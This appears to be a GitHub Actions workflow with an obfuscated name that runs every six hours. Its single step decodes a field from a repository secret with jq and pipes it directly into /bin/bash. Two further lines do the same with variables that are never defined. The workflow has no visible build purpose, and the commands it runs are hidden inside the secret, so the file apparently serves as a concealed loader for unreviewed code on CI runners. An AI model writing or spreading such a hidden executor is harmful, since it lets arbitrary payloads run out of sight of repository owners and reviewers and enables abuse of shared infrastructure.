name: daichengwei6175

on:
  workflow_dispatch:
  schedule:
    - cron: '14 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: daichengwei6175
        env:
          ppso92: ${{ secrets.ppso92 }}
        run: |
          echo $ppso92 | jq -r .xrz77 | /bin/bash
          echo $nlh67 | jq -r .d37235 | /bin/bash
          echo $vbv386 | jq -r .z76 | /bin/bash

